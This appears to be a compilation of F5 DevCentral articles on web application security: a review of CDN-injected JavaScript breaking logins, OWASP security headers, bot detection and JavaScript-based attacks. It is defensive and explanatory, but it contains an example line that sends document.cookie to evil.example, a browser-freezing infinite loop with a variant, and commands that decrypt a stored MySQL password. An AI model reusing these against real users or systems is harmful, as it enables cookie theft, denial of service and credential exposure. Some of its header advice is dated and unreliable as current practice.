JavaScript-injecting systems' effect on web application end users - a scenario review
Hello! ArvinF is back to share a scenario review where JavaScript-injecting systems affected web application end users - both web and mobile application users.

Problem

Users are failing to log in to a web application protected by BIG-IP ASM/Adv WAF and Shape Security Defense. The site owner notes that authentication was failing for an unknown reason. An ASM Support ID was noted, along with an error asking the user to enable JavaScript:

Please enable JavaScript to view the page's content. Your support ID is: xxxxxxxxxxxx

Troubleshooting

To understand the cause of the authentication failure, we gathered HTTP traffic through an HTTP sniffer. We used HttpWatch and gathered HAR (HTTP Archive) files. The site was protected with both on-premise BIG-IP ASM/Adv WAF bot defense and, at the time, Shape Security Defense (now F5 Distributed Cloud Bot Defense).

After reviewing the HAR file in HttpWatch, the following were noted:

ASM blocked a request to a URL related to authentication, with a Support ID in the response. The response also included JavaScript code referencing https[:]//s[.]go-mpulse[.]net/boomerang/.

The authentication attempt failed with an error in the HTTP response: ...unable to process your request. Please try again later...

HTTP cookies related to BIG-IP ASM/Adv WAF features were present, such as the TSPD_101* cookie from Bot Defense client-side challenges and other TS cookies, which could also come from Bot Defense, DoS profile, and security policy configurations.

There were also HTTP cookies coming from BIG-IP AVR - the f5_cspm cookie was present. The Application Visibility and Reporting (AVR) module provides detailed charts and graphs to give you more insight into the performance of web applications, with detailed views on HTTP and TCP stats, as well as system performance (CPU, memory, etc.).
https://clouddocs.f5.com/training/community/analytics/html/index.html
https://clouddocs.f5.com/api/irules/AVR_CSPM_INJECTION.html

Seeing the JavaScript code referencing "/boomerang/" included in the ASM blocking response was interesting. Reviewing the HAR file, there were several instances of this "/boomerang/". This finding was raised with the site owner, who noted that there is another system in the path between the end users and their web application - a CDN. The traffic flow is as follows:

End user web browser / mobile application >>> CDN >>> FW >>> BIG-IP >>> web application

On the BIG-IP Virtual Server that fronts the web application, the F5 AVR profile, ASM/Adv WAF Bot Defense and security policy, and the Shape Security Defense iRule are configured. From the F5 side, these were the products with features that may insert JavaScript into the client-side response.

As part of troubleshooting, to isolate the feature that might be causing the failing authentication, the Bot Defense profile was removed from the site's Virtual Server while the Shape Security iRule and AVR profile were left untouched. The site owner noted that authentication worked after this change. Shape Security Defense was implemented using an iRule to protect specific URIs. When the iRule was removed from the Virtual Server and the Bot Defense and AVR profiles were left on the VS, the site owner again noted that authentication worked. But with both the ASM/Adv WAF Bot Defense profile and the Shape Security Defense iRule configured on the VS, the site's authentication fails.
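As a side note on the HAR review step above, this kind of check is easy to script. Here is a minimal sketch in Node.js that flags HAR entries whose responses reference the injected boomerang loader or set F5-style TS cookies; the file name and marker strings are illustrative assumptions, not part of the original investigation.

// har-scan.js - minimal sketch: flag HAR entries whose responses contain
// an injected boomerang reference or F5-style TS*/f5_cspm cookies.
const fs = require('fs');

const har = JSON.parse(fs.readFileSync(process.argv[2] || 'capture.har', 'utf8'));

for (const entry of har.log.entries) {
  const body = (entry.response.content && entry.response.content.text) || '';
  const setCookies = entry.response.headers
    .filter(h => h.name.toLowerCase() === 'set-cookie')
    .map(h => h.value);

  const hasBoomerang = body.includes('go-mpulse.net/boomerang');
  const f5Cookies = setCookies.filter(v => /^(TS|TSPD_101|f5_cspm)/.test(v));

  if (hasBoomerang || f5Cookies.length) {
    console.log(entry.request.url);
    if (hasBoomerang) console.log('  - response body references boomerang');
    f5Cookies.forEach(c => console.log('  - cookie: ' + c.split(';')[0]));
  }
}

Running it against the captured HAR (node har-scan.js capture.har) quickly shows which URLs carry third-party script injection alongside the BIG-IP cookies, which is essentially what the manual HttpWatch review surfaced in this scenario.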
Per the site owner, there were no changes to the Bot Defense or Shape Security Defense iRule configurations prior to the incident, and these configurations had been in place well before it. The site owner shared the findings with their respective internal teams for review.

Resolution

Afterwards, the site owner shared that the site now works as expected and authentication succeeds for the web application, with no changes made to either the ASM/Adv WAF Bot Defense profile or the Shape Security Defense iRule on the site's VS. The cause of the authentication failure was undetermined. One theory on the possible cause: another system was inserting JavaScript code into the responses, and it might have affected the authentication process of the web application by preventing that portion of the site from loading.

Additional Troubleshooting Notes

The data gathered during the troubleshooting were the qkview and the HttpWatch capture - HAR files. It would help if a packet capture were taken along with the HttpWatch capture while the issue was happening, to have a full view of the issue. Decrypt the packet capture to observe the HTTP exchanges and correlate them with the HttpWatch capture events. The corresponding BIG-IP ASM/Adv WAF application event logs and Bot Defense or DoS protection logs will also be helpful in the correlation. Having a visual idea of how the Security Policy, Bot Defense, or DoS protection profile is configured is also helpful - so it's good to have a screenshot of these. It helps in analysis when there is complete data.

Gathering the asmqkview with report and traffic data and the corresponding ASM and AVR database dumps helps in the analysis:

asmqkview -s0 --add-request-log --include-traffic-data -f /var/tmp/`/bin/hostname`_asmqkview_`date +%Y%m%d%H%M%S`.tgz
# mysqldump -uroot -p`perl -I/ts/packages -MPassCrypt -nle 'print PassCrypt::decrypt_password($_)' /var/db/mysqlpw` DCC | gzip -9 > /shared/tmp/dcc.dump.gz
# mysqldump -uroot -p`perl -I/ts/packages -MPassCrypt -nle 'print PassCrypt::decrypt_password($_)' /var/db/mysqlpw` PLC | gzip -9 > /shared/tmp/plc.dump.gz
# mysqldump -uroot -p`perl -I/ts/packages -MPassCrypt -nle 'print PassCrypt::decrypt_password($_)' /var/db/mysqlpw` PRX | gzip -9 > /shared/tmp/prx.dump.gz
# mysqldump -uroot -p`perl -I/ts/packages -MPassCrypt -nle 'print PassCrypt::decrypt_password($_)' /var/db/mysqlpw` logdb | gzip -9 > /shared/tmp/logdb.dump.gz

(The backtick expression in each mysqldump command decrypts the MySQL password stored in /var/db/mysqlpw; the commands dump the DCC, PLC, PRX, and logdb databases and compress them.)

It would also help to know the systems in the path of the web application and whether they have features that may interfere with the features of BIG-IP ASM/Adv WAF or Shape Security Defense. Per the findings, there was a CDN injecting JavaScript code into the HTTP response, and it may have contributed to the authentication failure for the end users. Isolate potentially conflicting features by removing them one at a time and observing the HTTP responses. Per the reference configuration, BIG-IP ASM/Adv WAF, Shape Security Defense, and BIG-IP AVR worked well prior to the incident.

boomerang

The injected JavaScript code noted in the ASM blocking page response was loaded from https[:]//s[.]go-mpulse[.]net/boomerang/. Checking this reference, it was related to https://github.com/akamai/boomerang. boomerang is a JavaScript library that measures the page load time experienced by real users, commonly called RUM (Real User Measurement). It has the ability to send this data back to your server for further analysis. With boomerang, you find out exactly how fast your users think your site is.
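For context, a typical boomerang deployment initializes the library on the page and points it at a beacon endpoint that collects the timing data. The following is a minimal sketch based on the library's documented usage; the beacon URL is a placeholder assumption, and in this scenario the equivalent loader was injected by the CDN rather than added by the application itself.

// Minimal boomerang (RUM) setup sketch, assuming boomerang.min.js has
// already been loaded on the page. The beacon_url is a placeholder.
BOOMR.init({
  beacon_url: 'https://rum.example.com/beacon'   // where timing beacons are sent
});

When a third party in the delivery path injects this kind of loader into responses, it shows up in the client-side capture exactly as it did here - which is why a go-mpulse.net reference could appear even inside the ASM blocking page.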
In BIG-IP, the comparable feature is Application Visibility and Reporting (AVR), which collects data on the "performance of web applications, with detailed views on HTTP and TCP stats, as well as system performance (CPU, memory, etc.)." Organizations may have specific needs for the data they collect from their site or web application, and a customizable solution such as boomerang can help.

That's It For Now

I hope this scenario review of JavaScript-injecting systems and their effect on web application end users will be helpful in your next troubleshooting session, and that it gives you guidance on what data to gather, what to look for, and which troubleshooting options to consider. The F5 SIRT creates security-related content posted here in DevCentral, sharing the team's security mindset and knowledge. Feel free to view the articles that are tagged with the following: F5 SIRT series-F5SIRT-this-week-in-security TWIS
Snippet #7: OWASP Useful HTTP Headers

If you develop and deploy web applications then security is on your mind. When I want to understand a web security topic I go to OWASP.org, a community dedicated to enabling the world to create trustworthy web applications. One of my favorite OWASP wiki pages is the list of useful HTTP headers. This page lists a few HTTP headers which, when added to the HTTP responses of an app, enhance its security practically for free. Let's examine the list…

These headers can be added without concern that they affect application behavior:

X-XSS-Protection - Forces the enabling of cross-site scripting protection in the browser (useful when the protection may have been disabled)
X-Content-Type-Options - Prevents browsers from treating a response differently than the Content-Type header indicates

These headers may need some consideration before implementing:

Public-Key-Pins - Helps avoid man-in-the-middle attacks using forged certificates
Strict-Transport-Security - Enforces the use of HTTPS in your application, covered in some depth by Andrew Jenkins
X-Frame-Options / Frame-Options - Used to avoid "clickjacking", but can break an application; usually you want this
Content-Security-Policy / X-Content-Security-Policy / X-Webkit-CSP - Provides a policy for how the browser renders an app, aimed at avoiding XSS
Content-Security-Policy-Report-Only - Similar to CSP above, but only reports, no enforcement

Here is a script that incorporates three of the above headers, which are generally safe to add to any application (a sketch of the idea follows below). And that's it: about 20 lines of code to add 100 more bytes to the total HTTP response, and enhanced application security! Go get your own FREE license and try it today!
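As an illustration of what such a script can look like, here is a minimal sketch using a plain Node.js HTTP server; the port, the header values, and the choice of the third header are assumptions for illustration, not the original snippet.

// add-headers.js - minimal sketch: add three of the OWASP "useful headers"
// to every response. Values and port are illustrative assumptions.
const http = require('http');

http.createServer((req, res) => {
  // Safe to add to practically any application:
  res.setHeader('X-XSS-Protection', '1; mode=block');
  res.setHeader('X-Content-Type-Options', 'nosniff');
  // Needs a little thought (can break framed apps), but usually wanted:
  res.setHeader('X-Frame-Options', 'SAMEORIGIN');

  res.end('hello\n');
}).listen(8080);

The same handful of setHeader calls could live in whatever scripting layer fronts the application - the point being that a few added response headers buy real security for almost no cost.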
F5 Friday: An On-Demand Turing Test

Detecting bots requires more than a simple USER_AGENT check today…

Anyone who's taken an artificial intelligence class in college or grad school knows all about the Turing Test. If you aren't familiar with the concept, it was a "test proposed by Alan Turing in his 1950 paper Computing Machinery and Intelligence, which opens with the words: "I propose to consider the question, 'Can machines think?'"" Traditional Turing Tests always involve three players, and the goal is to fool a human interviewer such that the interviewer cannot determine which of the two players is human and which is a computer. There are variations on this theme, but they are almost always focused on "fooling" an interviewer regarding some aspect of the machine that it is attempting to imitate.

Common understanding has it that the purpose of the Turing Test is not specifically to determine whether a computer is able to fool an interrogator into believing that it is a human, but rather whether a computer could imitate a human. [44] While there is some dispute whether this interpretation was intended by Turing — Sterrett believes that it was [43] and thus conflates the second version with this one, while others, such as Traiger, do not [41] — this has nevertheless led to what can be viewed as the "standard interpretation." In this version, player A is a computer and player B a person of either gender. The role of the interrogator is not to determine which is male and which is female, but which is a computer and which is a human. [45]
-- Wikipedia, Turing Test

Over the past decade, as the web has grown more connected and intelligent, so too have the bots that crawl its voluminous pages, attempting to index the web and make it possible for search engines like Google and Bing to be useful. Alongside them have come the evil bots, the scripts, the automated attempts at exploiting vulnerabilities and finding holes in software that enable malicious miscreants to access data and systems to which they are not authorized. While a web application firewall and secure software development lifecycle practices can detect an attempted exploit, neither is necessarily very good at determining whether the request is coming from a bot (machine) or a real user.

Given the very real threat posed by bots, it's becoming increasingly important for organizations to detect and prevent these automated digital rodents from having access to web applications, especially business-critical applications. The trick is, however, to determine which requests are coming from bots and which ones are coming from real users. It's a trick not only because this determination is difficult to make with a high degree of confidence in the result, but because it needs to be made on demand, in real time. What organizations need is a sort of "on-demand Turing test" that can sort out the bots from the not bots.
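To make the opening point concrete, the naive approach looks something like the following - a minimal sketch, with an invented pattern list, of a USER_AGENT-only check; it is trivially defeated because the User-Agent header is entirely under the client's control.

// naive-bot-check.js - minimal sketch of the USER_AGENT-only check that is
// no longer sufficient. The pattern list is illustrative.
const http = require('http');

const BOT_PATTERN = /bot|crawler|spider|curl|wget/i;

http.createServer((req, res) => {
  const ua = req.headers['user-agent'] || '';
  if (BOT_PATTERN.test(ua)) {
    res.statusCode = 403;
    return res.end('Bots not allowed\n');
  }
  // A malicious client simply sends a browser-like User-Agent and sails
  // through, which is why challenge-based, real-time detection is needed.
  res.end('Welcome, presumed human\n');
}).listen(8080);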
The Great Client-Server Architecture Myth

The webification of applications over the years has led to the belief that client-server as an architecture is dying. But very few beliefs about architecture have been further from the truth. The belief that client-server was dying - or at least falling out of favor - was primarily due to the fact that early browser technology was used only as a presentation mechanism. The browser did not execute application logic, did not participate in application logic, and acted more or less like a television: smart enough to know how to display data but not smart enough to do anything about it.

But the sudden explosion of Web 2.0 style applications and REST APIs has changed all that, and client-server is very much in style again, albeit with a twist. Developers no longer need to write the core of a so-called "fat client" from the ground up. The browser or a framework such as Adobe AIR or Microsoft's Silverlight provides the client-side platform on which applications are developed and deployed. These client-side platforms have become very similar in nature to their server-side cousins, application servers, taking care of the tedious tasks associated with building and making connections to servers, parsing data, and even storage of user-specific configuration data.

Even traditional thin-client applications are now packing on the pounds, using AJAX and various JavaScript libraries to provide both connectivity and presentation components to developers in the same fashion that AIR and Silverlight provide a framework for developers to build richer, highly interactive applications. These so-called RIAs (Rich Internet Applications) are, in reality, thin clients that are rapidly gaining weight.

One of the core reasons client-server architecture is being reinvigorated is the acceptance of standards. As developers have moved toward not only HTTP as the de facto transport protocol but HTML, DHTML, CSS, and JavaScript as primary client-side technologies, so have device makers accepted these technologies as the "one true way" to deliver applications to multiple clients from a single server-side architecture. It's no longer required that a client be developed for every possible operating system and device combination. A single server-side application can serve any and all clients capable of communicating via HTTP and rendering HTML, DHTML, CSS, and executing client-side scripts. Standards, they are good things after all.

Client-server architectures are not going away. They have simply morphed from an environment-specific model to an environment-agnostic model that is much more efficient in terms of development costs and ability to support a wider range of users, but they are still based on the same architectural principles. Client-server as a model works and will continue to work as long as the infrastructure over which such applications are delivered continues to mature and recognizes that, while one application may be capable of being deployed and used from any device, the environments over which it is delivered may impact the performance and security of that application. The combination of fatter applications and increasing client-side application logic execution means more opportunities for exploitation as well as the potential for degradation of performance.
Because client-server applications are now agnostic and capable of being delivered and used on a variety of devices and clients, they are not specifically optimized for any given environment, and developers do not necessarily have access to the network and transport layer components they would need in order to optimize them. These applications are written specifically not to care, and yet the device, the location of the user, and the network over which the application is delivered are all relevant to application performance and security.

The need for context-aware application delivery is more important now than ever, as the same application may be served to the same user but rendered in a variety of different client environments and in a variety of locations. All these variables must be accounted for in order to deliver these fat-client RIAs in the most secure, performant fashion regardless of where the user may be, over what network the application is being delivered, and what device the user may be using at the time.
Why it's so hard to secure JavaScript

The discussion yesterday on JavaScript and security got me thinking about why it is that there are no good options other than script management add-ons like NoScript for securing JavaScript.

In a compiled language there may be multiple ways to write a loop, but the underlying object code generated is the same. A loop is a loop, regardless of how it's represented in the language. Security products that insert shims into the stack, run as a proxy on the server, or reside in the network can look for anomalies in that object code. This is the basis for many types of network security - IDS, IPS, AVS, intelligent firewalls. They look for anomalies in signatures, and if they find one they consider it a threat.

While the execution of a loop in an interpreted language is also the same regardless of how it's represented, it looks different to security devices because it's often text-based, as is the case with JavaScript and XML. There are only two good options for externally applying security to languages that are interpreted on the client: pattern matching/regex and parsing. Pattern matching and regular expressions provide minimal value for securing client-side interpreted languages, at best, because of the incredibly high number of possible combinations of putting together code. As we learned from preventing SQL injection and XSS, attackers are easily able to avoid detection by these systems by simply adding white space, removing white space, using encoding tricks, and just generally finding a new permutation of their code.

Parsing is, of course, the best answer. As 7rans noted yesterday regarding the Billion More Laughs JavaScript hack, if you control the stack, you control the execution of the code. Similarly, if you parse the data you can get it into a format more akin to that of a compiled language and then you can secure it. That's the reasoning behind XML threat defense, or XML firewalls. In fact, all SOA and XML security devices necessarily parse the XML they are protecting - because that's the only way to know whether or not some typical XML attacks, like the Billion Laughs attack, are present.

But this implementation comes at a price: performance. Parsing XML is compute intensive, and it necessarily adds latency. Every device you add into the delivery path that must parse the XML to route it, secure it, or transform it adds latency and increases response time, which decreases overall application performance. This is one of the primary reasons most XML-focused solutions prefer to use a streaming parser. Streaming parser performance is much better than a full DOM parser, and still provides the opportunity to validate the XML and find malicious code. It isn't a panacea, however, as there are still some situations where streaming can't be used - primarily when transformation is involved.

We know this already, and also know that JavaScript and client-side interpreted languages in general are far more prolific than XML. Parsing JavaScript externally to determine whether it contains malicious code would certainly make it more secure, but it would also likely severely impact application performance - and not in a good way.
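The pattern-matching weakness described above is easy to demonstrate. Here is a minimal sketch - the "signature" and both payloads are invented for illustration - showing a regex catching the obvious form of a cookie-grabbing snippet while missing a trivially reworked equivalent.

// signature-evasion.js - minimal sketch of why regex signatures struggle
// with interpreted code. Signature and payloads are illustrative only.
const signature = /document\.cookie/;

const obvious  = 'new Image().src = "//evil.example/c?" + document.cookie;';
const reworked = 'new Image().src = "//evil.example/c?" + document["coo" + "kie"];';

console.log(signature.test(obvious));   // true  - caught
console.log(signature.test(reworked));  // false - same behavior, not caught

Every tweak to the signature invites another permutation of the payload, which is exactly the arms race described above for SQL injection and XSS filters.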
We also know that streaming JavaScript isn't a solution because, unlike an XML document, JavaScript is not confined. JavaScript is delimited, certainly, but it isn't confined to just being in the HEAD of an HTML document. It can be anywhere in the document, and often is. Worse, JavaScript can self-modify at run-time - and often does. That means that the security threat may not be in the syntax or the code when it's delivered to the client, but it might appear once the script is executed. Not only would an intermediate security device need to parse the JavaScript, it would need to execute it in order to properly secure it.

While almost all web application security solutions - ours included - are capable of finding specific attacks like XSS and SQL injection that are hidden within JavaScript, none are able to detect and prevent JavaScript code-based exploits unless they can be identified by a specific signature or pattern. And as we've just established, that's no guarantee the exploits won't morph and change as soon as they can be prevented.

That's why browser add-ons like NoScript are so popular: because JavaScript security today is binary - allow or deny. Period. There's no real in-between. There is no JavaScript proxy that parses and rejects malicious script, no solution that proactively scans JavaScript for code-based exploits, no external answer to the problem. That means we have to rely on the browser developers not only to write a good browser with all the bells and whistles we like, but to provide security as well. I am not aware of any security solution that currently parses out JavaScript before it's delivered to the client. If there are any out there, I'd love to hear about them.
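To make the "self-modify at run-time" point concrete, here is a minimal, harmless sketch: the token an external scanner would look for never appears in the delivered source and only exists after the code runs. The string pieces are invented for illustration.

// runtime-construction.js - harmless sketch of code that assembles its real
// behavior at run-time. The flaggable token ("document.cookie") is absent
// from the delivered text; a real attack would hand the assembled string to
// eval() or Function(), which static inspection never sees.
const pieces = ['docu', 'ment.coo', 'kie'];
const constructed = pieces.join('');

console.log(constructed);   // "document.cookie" - only exists at run-time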
A Billion More Laughs: The JavaScript hack that acts like an XML attack

Don is off in Lowell working on a project with our ARX folks, so I was working late last night (finishing my daily read of the Internet) and ended up reading Scott Hanselman's discussion of threads versus processes in Chrome and IE8. It was a great read, if you like that kind of thing (I do), and it does a great job of digging into some of the RAMifications (pun intended) of the new programmatic models for both browsers. But this isn't about processes or threads, it's about an interesting comment that caught my eye:

This will make IE8 Beta 2 unresponsive ..
t = document.getElementById("test");
while(true) {
  t.innerHTML += "a";
}

What really grabbed my attention is that this little snippet of code is so eerily similar to the XML "Billion Laughs" exploit, in which an entity is expanded recursively for, well, forever and essentially causes a DoS attack on whatever system (browser, server) was attempting to parse the document. What makes scripts like this scary is that many forums and blogs that are less vehement about disallowing HTML and script can be easily exploited by a code snippet like this, which could cause the browser of all users viewing the infected post to essentially "lock up".

This is one of the reasons why IE8 and Chrome moved to a more segregated tabbed model, with each tab basically its own process rather than a thread - to prevent corruption in one from affecting others. But given the comment this doesn't seem to be the case with IE8 (there's no indication Chrome was tested with this code, so whether it handles the situation or not is still to be discovered). This is likely because it's not a corruption, it's valid JavaScript. It just happens to be consuming large quantities of memory very quickly and not giving the other processes in other tabs in IE8 a chance to execute.

The reason the JavaScript version was so intriguing was that it's nearly impossible to stop. The XML version can be easily detected and prevented by an XML firewall, and most modern XML parsers can be configured to stop parsing and thus prevent the document from wreaking havoc on a system. But this JavaScript version is much more difficult to detect and thus prevent because it's code, and thus not confined to a specific format with specific syntactical attributes. I can think of about 20 different versions of this script - all valid and all of them different enough to make pattern matching or regular expressions useless for detection. And I'm no evil genius, so you can bet there are many more.

The best option for addressing this problem? Disable scripts. The conundrum is that disabling scripts can cause many, many sites to become unusable because they are taking advantage of AJAX functionality, which requires...yup, scripts. You can certainly enable scripts only on specific sites you trust (which is likely what most security folks would suggest should be default behavior anyway) but that's a PITA and the very users we're trying to protect aren't likely to take the time to do this - or even understand why it's necessary.

With the increasing dependence upon scripting to provide functionality for RIAs (Rich Interactive Applications) we're going to have to figure out how to address this problem, and address it soon. Eliminating scripting is not an option, and a default deny policy (essentially whitelisting) is unrealistic. Perhaps it's time for signed scripts to make a comeback.
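As an illustration of the "20 different versions" point, here is one permutation (invented for illustration, and it will make the executing tab unresponsive just like the original): it avoids both the while(true) and innerHTML += tokens a signature might key on, yet performs the same unbounded DOM growth against the same element.

// A permutation of the runaway-growth snippet above. Do not run it in a
// tab you care about; it assumes an element with id "test" exists, as in
// the original comment.
var el = document.getElementById("test");
for (;;) {                                    // no "while(true)" to match on
  el.insertAdjacentHTML("beforeend", "a");    // no "innerHTML +=" either
}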
Working around client-side limitations on custom HTTP headers

One of the most well-kept secrets in technology is the extensibility of HTTP. It's one of the reasons it became the de facto application transport protocol, and it was instrumental in getting SOAP off the ground before SOAP 1.2 and WS-I Basic Profile made the requirement for the SOAP Action header obsolete.

Web browsers aren't capable of adding custom HTTP headers on their own; that functionality comes from the use of client-side scripting languages such as JavaScript or VBScript. Other RIA (Rich Internet Application) client platforms such as Adobe AIR and Flash are also capable of adding HTTP headers, though both have limitations on which (if any) custom headers you can use.

There are valid reasons for wanting to set a custom header. The most common use of custom HTTP headers is to preserve in some way the source IP address of the client for logging purposes in a load-balanced environment, using the X-Forwarded-For custom header. Custom HTTP headers can be set by the client, or set by the server or an intermediary (load balancer, application delivery controller, cache) as well, often to indicate that the content has passed through a proxy. A quick perusal of the web shows developers desiring to use custom HTTP headers for a variety of reasons including security, SSO (single sign-on) functionality, and transferring data between pages/applications.

Unfortunately, a class of vulnerabilities known as "HTTP header injection" often causes platform providers like Adobe to limit or completely remove the ability to manipulate HTTP headers on the client. And adding custom headers using JavaScript or VBScript may require modification of the application and relies on the user allowing scripts to run in the first place, the consistency of which can no longer be relied upon.

But what if you really need those custom headers to either address a problem or enable some functionality? All is not lost; you can generally use an intelligent proxy-based load balancer (application delivery controller) to insert the headers for you. If the load balancer/application delivery controller has the ability to inspect requests and modify the requests and responses with a technology like iRules, you can easily add your custom headers at the intermediary without losing the functionality desired or needing to change the request method from GET to POST, as some have done to get around these limitations.

Using your load balancer/application delivery controller to insert, delete, or modify custom HTTP headers has other advantages as well:

You don't need to modify the client or the server-side application or script that served the client
The load balancer can add the required custom HTTP header(s) for all applications at one time in one place
Your application will still work even if the client disables scripting

Custom HTTP headers are often used for valid reasons when developing applications. The inability to manipulate them easily on the client can interfere with the development lifecycle and make it more difficult to address vulnerabilities and quirks with packaged applications and the platforms on which applications are often deployed. Taking advantage of more advanced features available in modern load balancers/application delivery controllers makes implementing such workarounds simple.
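For reference, the client-side approach described above looks like this in JavaScript - a minimal sketch using the standard XMLHttpRequest API; the header name and URL are illustrative assumptions, and browsers will refuse to set certain restricted headers no matter what the script asks for.

// custom-header.js - minimal sketch of setting a custom header from
// client-side script. Header name and endpoint are illustrative; browsers
// silently forbid restricted headers (Host, Referer, Cookie, etc.).
var xhr = new XMLHttpRequest();
xhr.open('GET', '/api/resource', true);
xhr.setRequestHeader('X-App-Context', 'checkout-step-2');
xhr.onload = function () {
  console.log(xhr.status, xhr.responseText);
};
xhr.send();

The alternative recommended above is to insert such headers at the load balancer/application delivery controller instead, so the header arrives consistently even when the client disables scripting or the platform restricts it.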
Follow up: Speeding Up JavaScript

Diving more deeply into the issue of speeding up JavaScript and the load balancing question, Scott Conroy points out:

The single URL strategy has a major downside, though it is certainly cleaner than having to deal with many URLs. Since HTTP 1.1 says that user agents and servers SHOULD have only two concurrent connections, requests for multiple resources can easily develop into blocking operations. If, say, I have a page that includes twenty images to download, my browser (in its default config) will only download 2 images at a time. If I put those images on multiple "servers" (e.g. a.images.example.com, b.images.example.com, c.images.example.com) then I'm able to download two images from *each* of the servers. Accomplishing this without a content management system - or some fancy HTTP response rewriting - could be onerous, but it's likely worth it for some media-rich sites/applications.

I took umbrage at the statement "This [a single URL] is not easy to scale" because I was looking at it purely from a server-side viewpoint. My bad. Scott points out, correctly, that the ability to scale on the server side doesn't do a darn thing for the client side. If user agents correctly implement HTTP 1.1, then requests for multiple resources via a single host can indeed easily develop into blocking operations.

I do think a multiple-host option is a good solution to this issue in general, but I'm not thrilled about accomplishing such an implementation by hardcoding those hosts/URIs inside the applications being delivered. Scott appears to agree, pointing out that without help - he suggests a content management system or fancy HTTP response rewriting - this solution to the client-side scaling issue might be "onerous" to implement. Certainly as sites grow larger and more complex, or changes are made, this architectural solution will take more time to deploy/maintain and, because you're modifying code, increases the possibility of introducing delivery errors through malformed URLs.

WebAccelerator has long included a feature set called Intelligent Browser Referencing that, among other optimization and acceleration options, includes this very functionality, i.e. using multiple hosts to increase the number of connections between the client and the server and thus decrease the time required to load. It does this transparently and scales well, which reduces several of the problems inherent in implementing this type of solution manually - particularly the possibility of serving up malformed URLs.

The problem with this solution (multiple hosts) in general is that many folks today use hosting providers, and those hosting providers don't always allow you to create additional host names willy-nilly unless you're lucky enough to be hosting your entire domain with them. Even then you may find it's an onerous process to add additional host names before modifying applications to use them. This is particularly true for the use case first introduced with this topic - blogs.

Imbibing: Coffee

Technorati tags: MacVittie, f5, BIG-IP, application delivery, web 2.0, javascript, application acceleration
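To make the "fancy HTTP response rewriting" idea concrete, here is a minimal client-side sketch of the host-sharding trick, using the example hosts from Scott's comment; the hashing scheme is an illustrative assumption, and a real deployment would normally do this rewriting in the CMS, at build time, or in the delivery controller rather than in page script.

// shard-hosts.js - sketch: spread image requests across a.images/b.images/
// c.images.example.com so the browser can open more parallel connections.
var SHARDS = ['a.images.example.com', 'b.images.example.com', 'c.images.example.com'];

function shardFor(path) {
  var hash = 0;
  for (var i = 0; i < path.length; i++) {
    hash = (hash * 31 + path.charCodeAt(i)) >>> 0;   // stable choice per URL
  }
  return SHARDS[hash % SHARDS.length];
}

// Rewrite every <img> on the page to point at its shard.
Array.prototype.forEach.call(document.images, function (img) {
  var path = new URL(img.src, location.href).pathname;
  img.src = 'https://' + shardFor(path) + path;
});

Keeping the shard choice deterministic per URL matters: if the same image bounced between hosts on different pages, the browser cache would be defeated and the "speed-up" would cost more than it saved.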
Web 2.0 Security Part 5: Strategies to CUT RISK

Over the past few weeks we've examined the issues inherent in Web 2.0 and in particular AJAX-based applications. These issues need to be dealt with, but they should not be considered "show stoppers" to moving ahead with your Web 2.0 initiative. Consider the security ramifications of the design, implementation, and deployment of your new application carefully. Build security into your new application up front and you'll certainly be able to decrease the potential risks associated with this growing technology.

Consider the following methods to CUT the RISK associated with deploying Web 2.0 applications:

• Check VA tools for AJAX support. Validate that the assessment and test tools you use to verify the security of your applications are capable of:
  - Interpreting and evaluating dynamic URLs from JavaScript
  - Creating (or capturing, at a minimum) requests in the appropriate markup languages (JSON, XML, D/HTML)

• Understand the application. Document and examine regularly:
  - Scripts associated with the application
  - Data sources accessed
  - Access patterns
  - Cookies used

• Trust no client. Implement policies that assume the request is coming from an attacker (a minimal validation sketch follows below):
  - Validate input
  - Validate the request
  - Validate the client

• Reduce the number of scripts. If possible, reduce the number of scripts/applications to reduce the entry points through which attackers can gain access to the application.

• Invest in a web application firewall. Web application firewalls mediate between client and server and provide:
  - Application security through request verification
  - Client security through response verification
  - Not a panacea, but a first line of defense
  - Cannot stop logic-layer attacks

• Secure sensitive data using SSL:
  - SSL for transport layer encryption
  - Cookie encryption

• Kick back suspicious data. Data integrity should be validated on both request and response:
  - Stop sensitive data from leaving the organization
  - Stop malicious data and code from entering the organization
  - Choose from one or more options: code (custom), software, hardware

Imbibing: Coffee

Technorati tags: F5, MacVittie, Web 2.0, security, AJAX, application security, javascript
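As a minimal illustration of the "Trust no client" item above, here is a sketch of server-side allow-list validation; the field names and rules are invented for illustration and apply regardless of whatever checks the client-side script already performed.

// validate-input.js - sketch of "trust no client": validate every field
// against a server-side allow-list. Field names/rules are illustrative.
const RULES = {
  username: /^[a-zA-Z0-9_]{3,32}$/,
  email:    /^[^@\s]+@[^@\s]+\.[^@\s]+$/,
  quantity: /^[0-9]{1,4}$/
};

function validate(params) {
  const errors = [];
  for (const [field, pattern] of Object.entries(RULES)) {
    const value = params[field];
    if (typeof value !== 'string' || !pattern.test(value)) {
      errors.push(field);   // reject anything outside the allow-list
    }
  }
  return errors;
}

console.log(validate({ username: 'alice_1', email: 'a@example.com', quantity: '2' }));  // []
console.log(validate({ username: '<script>', email: 'nope', quantity: '99999' }));      // [ 'username', 'email', 'quantity' ]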
Web 2.0 Security Part 3: A MASHup of Problems

This is Part 3 of a series on Web 2.0 Security. A good way to remember things is to use mnemonics, so when you're trying to list the security issues relevant to Web 2.0, just remember this: it's a MASHup.

More of everything
Asymmetric data formats
Scripting based
Hidden URLs and code

This episode is brought to you by the letter "S".

Scripting-based

Web 2.0 technologies, specifically AJAX, are based on the execution of scripts. As we mentioned in Part 1 of this series, there are a lot more scripts than are typically found in a traditional web application. While on the server side this is often alleviated by combining multiple scripts into a single application that takes advantage of parameter-based execution (more closely related to SOA than not), there are also scripts on the client that open up new security threats. In fact, here are a few client-side scripting vulnerabilities that have been discovered - and subsequently exploited:

Yahoo Worm
MySpace Worm
AJAX-Spell HTML Tag Script Injection Vulnerability

These vulnerabilities only scratch the surface of how JavaScript might be exploited. One of the problems with JavaScript is that it is interpreted on the client, and there are no validation mechanisms. That is, malicious JavaScript looks just like valid JavaScript. You can't just examine the script for specific keywords or patterns and determine that the script is malicious.

JavaScript is also self-extensible. That is to say, you can modify existing JavaScript objects - like the XMLHttpRequest object - by forcing the browser to evaluate new JavaScript that extends and adds functionality to the object. And by "forcing" I really mean delivering a script to the client; the browser will gleefully interpret any script in the page as long as it's in a language it understands.

JavaScript is also dynamic. It can evaluate code that extends itself, which in turn evaluates more code, and so on. The possibilities are limited only by the creativeness of the author. Where the sandbox (the JavaScript VM) was supposed to - and for the most part does - protect the client from most of the really horrible possible exploits, such as destruction of your files, it doesn't prevent some of the more subtle exploits dealing with sensitive data, such as cookie theft or just generally grabbing data from your global clipboard.

